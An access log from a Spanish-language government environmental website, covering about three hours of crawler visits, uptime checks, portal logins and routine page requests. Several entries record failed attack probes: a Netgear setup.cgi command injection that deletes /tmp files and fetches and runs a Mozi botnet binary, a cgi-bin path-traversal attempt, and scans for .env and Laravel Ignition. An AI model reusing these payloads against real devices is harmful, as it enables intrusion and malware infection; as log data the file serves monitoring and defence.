157.55.39.33 - - [21/Nov/2021:04:15:50 -0500] "GET /bla/resoluciones/autos%202021/4817.pdf HTTP/1.1" 200 412288
183.136.225.9 - - [21/Nov/2021:04:16:57 -0500] "GET / HTTP/1.1" 200 319
183.136.225.9 - - [21/Nov/2021:04:16:58 -0500] "GET / HTTP/1.1" 200 319
66.249.79.236 - - [21/Nov/2021:04:17:14 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:04:17:32 -0500] "HEAD / HTTP/1.1" 200 -
198.98.49.124 - - [21/Nov/2021:04:20:04 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Nov/2021:04:22:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:04:23:22 -0500] "-" 408 -
201.245.192.253 - - [21/Nov/2021:04:23:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45314
201.245.192.253 - - [21/Nov/2021:04:23:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44865
201.245.192.253 - - [21/Nov/2021:04:24:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113878
216.245.221.92 - - [21/Nov/2021:04:27:32 -0500] "HEAD / HTTP/1.1" 200 -
45.146.164.110 - - [21/Nov/2021:04:28:39 -0500] "GET /console/ HTTP/1.1" 404 1018
157.55.39.31 - - [21/Nov/2021:04:27:12 -0500] "GET /bla/boletinlegal/index.php/js/jquery.js HTTP/1.1" 200 63268
66.249.79.236 - - [21/Nov/2021:04:29:34 -0500] "-" 408 -
186.30.45.141 - - [21/Nov/2021:04:29:57 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [21/Nov/2021:04:32:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:04:33:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45314
201.245.192.253 - - [21/Nov/2021:04:34:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44865
66.249.79.236 - - [21/Nov/2021:04:35:20 -0500] "-" 408 -
201.245.192.253 - - [21/Nov/2021:04:34:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113878
216.245.221.92 - - [21/Nov/2021:04:37:32 -0500] "HEAD / HTTP/1.1" 200 -
95.108.213.70 - - [21/Nov/2021:04:40:14 -0500] "-" 408 -
87.250.224.32 - - [21/Nov/2021:04:40:19 -0500] "-" 408 -
87.250.224.44 - - [21/Nov/2021:04:40:24 -0500] "-" 408 -
87.250.224.122 - - [21/Nov/2021:04:40:29 -0500] "-" 408 -
87.250.224.112 - - [21/Nov/2021:04:40:44 -0500] "-" 408 -
213.180.203.17 - - [21/Nov/2021:04:40:59 -0500] "-" 408 -
5.255.253.164 - - [21/Nov/2021:04:41:30 -0500] "-" 408 -
66.249.79.236 - - [21/Nov/2021:04:42:06 -0500] "-" 408 -
213.180.203.138 - - [21/Nov/2021:04:42:29 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:04:42:32 -0500] "HEAD / HTTP/1.1" 200 -
60.217.75.69 - - [21/Nov/2021:04:42:38 -0500] "GET / HTTP/1.1" 200 319
87.250.224.132 - - [21/Nov/2021:04:43:29 -0500] "-" 408 -
201.245.192.253 - - [21/Nov/2021:04:43:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45314
201.245.192.253 - - [21/Nov/2021:04:43:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44865
201.245.192.253 - - [21/Nov/2021:04:44:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113878
216.245.221.92 - - [21/Nov/2021:04:47:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:04:47:58 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:04:52:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:04:53:44 -0500] "-" 408 -
201.245.192.253 - - [21/Nov/2021:04:54:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113878
216.245.221.92 - - [21/Nov/2021:04:57:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:05:00:19 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:05:02:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:05:04:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
66.249.79.236 - - [21/Nov/2021:05:06:26 -0500] "-" 408 -
34.147.58.195 - - [21/Nov/2021:05:07:14 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Nov/2021:05:07:32 -0500] "HEAD / HTTP/1.1" 200 -
45.146.164.110 - - [21/Nov/2021:05:11:04 -0500] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1018
192.241.208.18 - - [21/Nov/2021:05:12:28 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Nov/2021:05:12:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:05:13:39 -0500] "-" 408 -
54.191.183.98 - - [21/Nov/2021:05:14:46 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [21/Nov/2021:05:14:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113872
216.245.221.92 - - [21/Nov/2021:05:17:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:05:21:23 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:05:22:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:05:23:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45157
201.245.192.253 - - [21/Nov/2021:05:23:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44859
201.245.192.253 - - [21/Nov/2021:05:24:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113872
216.245.221.92 - - [21/Nov/2021:05:27:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:05:28:21 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:05:32:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:05:33:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45157
201.245.192.253 - - [21/Nov/2021:05:33:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44859
201.245.192.253 - - [21/Nov/2021:05:34:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113872
173.252.127.18 - - [21/Nov/2021:05:36:26 -0500] "GET /images/feria-movil-sda-19-noviembre.jpg HTTP/1.1" 200 47278
216.245.221.92 - - [21/Nov/2021:05:37:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:05:41:04 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:05:42:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:05:43:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45157
201.245.192.253 - - [21/Nov/2021:05:43:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44859
201.245.192.253 - - [21/Nov/2021:05:44:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113872
45.146.164.110 - - [21/Nov/2021:05:45:38 -0500] "GET /_ignition/execute-solution HTTP/1.1" 404 1018
216.245.221.92 - - [21/Nov/2021:05:47:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:05:48:50 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:05:52:31 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.24 - - [21/Nov/2021:05:55:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1054.pdf HTTP/1.1" 304 -
201.245.192.253 - - [21/Nov/2021:05:54:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113872
40.77.167.11 - - [21/Nov/2021:05:56:51 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Palma-F%C3%A9nix-%C3%A1rboles.jpg HTTP/1.1" 200 312005
183.136.225.9 - - [21/Nov/2021:05:57:24 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:05:57:31 -0500] "HEAD / HTTP/1.1" 200 -
31.13.127.37 - - [21/Nov/2021:05:58:08 -0500] "GET /images/pieza-grafica-noviembre-17.jpg HTTP/1.1" 200 48558
173.252.107.12 - - [21/Nov/2021:05:58:08 -0500] "GET /aprende-a-conocer-el-boletin-legal-ambiental.html HTTP/1.1" 206 892
173.252.107.4 - - [21/Nov/2021:05:58:08 -0500] "GET /aprende-a-conocer-el-boletin-legal-ambiental.html HTTP/1.1" 206 892
173.252.107.23 - - [21/Nov/2021:05:58:08 -0500] "GET /images/pieza-grafica-noviembre-17.jpg HTTP/1.1" 200 48558
173.252.107.15 - - [21/Nov/2021:05:58:08 -0500] "GET /aprende-a-conocer-el-boletin-legal-ambiental.html HTTP/1.1" 206 892
190.159.24.137 - - [21/Nov/2021:05:58:12 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
173.252.107.23 - - [21/Nov/2021:05:58:13 -0500] "GET /aprende-a-conocer-el-boletin-legal-ambiental.html HTTP/1.1" 206 892
216.245.221.92 - - [21/Nov/2021:06:02:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:06:04:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
34.90.13.46 - - [21/Nov/2021:06:05:46 -0500] "GET / HTTP/1.1" 200 319
69.171.249.15 - - [21/Nov/2021:06:06:29 -0500] "GET /images/pieza-grafica-noviembre-17.jpg HTTP/1.1" 200 48558
216.245.221.92 - - [21/Nov/2021:06:07:31 -0500] "HEAD / HTTP/1.1" 200 -
45.146.164.110 - - [21/Nov/2021:06:09:30 -0500] "GET / HTTP/1.1" 200 319
194.85.248.160 - - [21/Nov/2021:06:09:57 -0500] "GET / HTTP/1.1" 200 319
120.85.116.183 - - [21/Nov/2021:06:10:41 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
157.55.39.214 - - [21/Nov/2021:06:11:44 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12505
216.245.221.92 - - [21/Nov/2021:06:12:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:06:14:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113903
70.37.106.128 - - [21/Nov/2021:06:15:37 -0500] "GET /.env HTTP/1.1" 404 1018
70.37.106.128 - - [21/Nov/2021:06:15:37 -0500] "POST / HTTP/1.1" 200 319
31.13.103.4 - - [21/Nov/2021:06:16:51 -0500] "GET /images/pieza-grafica-noviembre-17.jpg HTTP/1.1" 200 48558
216.245.221.92 - - [21/Nov/2021:06:17:31 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [21/Nov/2021:06:22:31 -0500] "HEAD / HTTP/1.1" 200 -
209.141.46.14 - - [21/Nov/2021:06:22:38 -0500] "GET /config/getuser?index=0 HTTP/1.1" 404 1018
201.245.192.253 - - [21/Nov/2021:06:23:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45336
201.245.192.253 - - [21/Nov/2021:06:23:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44890
201.245.192.253 - - [21/Nov/2021:06:24:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113903
216.245.221.92 - - [21/Nov/2021:06:27:31 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [21/Nov/2021:06:32:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:06:33:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45336
23.100.232.233 - - [21/Nov/2021:06:34:07 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
23.100.232.233 - - [21/Nov/2021:06:34:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
40.77.167.14 - - [21/Nov/2021:06:34:37 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 178896
201.245.192.253 - - [21/Nov/2021:06:33:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44890
173.252.107.22 - - [21/Nov/2021:06:34:50 -0500] "GET /secretaria-de-ambiente-se-suma-a-la-tendencia-tik-tok.html HTTP/1.1" 206 1022
173.252.107.11 - - [21/Nov/2021:06:34:50 -0500] "GET /secretaria-de-ambiente-se-suma-a-la-tendencia-tik-tok.html HTTP/1.1" 206 1022
173.252.107.119 - - [21/Nov/2021:06:34:50 -0500] "GET /images/tik-tok-red-social%20secretaria-ambiente-30-octubre.jpg HTTP/1.1" 200 23521
69.63.189.3 - - [21/Nov/2021:06:34:50 -0500] "GET /images/imagen-comunicado-podcast.jpg HTTP/1.1" 200 39765
173.252.107.17 - - [21/Nov/2021:06:34:51 -0500] "GET /images/POT%20ciudad%20bol%C3%ADvar-6%20octubre.jpg HTTP/1.1" 404 1034
184.105.247.254 - - [21/Nov/2021:06:35:31 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Nov/2021:06:37:31 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.17 - - [21/Nov/2021:06:38:05 -0500] "GET /2017/06/11/recorridos-educativos/ HTTP/1.1" 404 1049
173.252.127.27 - - [21/Nov/2021:06:39:54 -0500] "GET /aprende-a-conocer-el-boletin-legal-ambiental.html?fbclid=IwAR1rehlWcL5q4VCHAoOG726lm3Js3rioKuO955-WNZdb7Hj1A8_J_9hlCms HTTP/1.1" 200 892
216.245.221.92 - - [21/Nov/2021:06:42:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:06:43:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45336
173.252.107.6 - - [21/Nov/2021:06:44:12 -0500] "GET /images/feria-movil-sda-19-noviembre.jpg HTTP/1.1" 200 47278
201.245.192.253 - - [21/Nov/2021:06:43:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44890
69.171.251.19 - - [21/Nov/2021:06:47:06 -0500] "GET /con-el-pot-bogota-tendra-30-mas-de-areas-verdes-protegidas.html?fbclid=IwAR2rX1mBOa-eVa-tqYIzfSaSPeZMx_mReiPRK9c4tqxWiu1i9REMtMF8IpQ HTTP/1.1" 200 940
216.245.221.92 - - [21/Nov/2021:06:47:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.249.42 - - [21/Nov/2021:06:48:30 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:31 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:31 -0500] "GET /sipse/faces/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
201.245.249.42 - - [21/Nov/2021:06:48:31 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:32 -0500] "GET /sipse/faces/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12183
201.245.249.42 - - [21/Nov/2021:06:48:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:48:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
157.55.39.31 - - [21/Nov/2021:06:50:25 -0500] "GET /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
157.55.39.31 - - [21/Nov/2021:06:50:27 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12505
45.146.164.110 - - [21/Nov/2021:06:50:29 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 945
216.245.221.92 - - [21/Nov/2021:06:52:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.249.42 - - [21/Nov/2021:06:52:34 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:34 -0500] "GET /sipse/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12183
201.245.249.42 - - [21/Nov/2021:06:52:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:35 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:35 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:36 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12183
201.245.249.42 - - [21/Nov/2021:06:52:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.249.42 - - [21/Nov/2021:06:52:37 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:45 -0500] "GET /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 302 -
190.102.124.99 - - [21/Nov/2021:06:53:45 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12183
190.102.124.99 - - [21/Nov/2021:06:53:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:46 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
190.102.124.99 - - [21/Nov/2021:06:53:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:46 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12183
190.102.124.99 - - [21/Nov/2021:06:53:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:53:52 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2222
190.102.124.99 - - [21/Nov/2021:06:53:52 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:03 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:04 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16255
190.102.124.99 - - [21/Nov/2021:06:54:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:04 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
190.102.124.99 - - [21/Nov/2021:06:54:06 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:06 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
190.102.124.99 - - [21/Nov/2021:06:54:07 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 60889
190.102.124.99 - - [21/Nov/2021:06:54:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.102.124.99 - - [21/Nov/2021:06:54:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1452
201.245.192.253 - - [21/Nov/2021:06:54:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113903
157.55.39.33 - - [21/Nov/2021:06:57:26 -0500] "GET /bla/resoluciones/autos%202021/2198.pdf HTTP/1.1" 200 358673
216.245.221.92 - - [21/Nov/2021:06:57:31 -0500] "HEAD / HTTP/1.1" 200 -
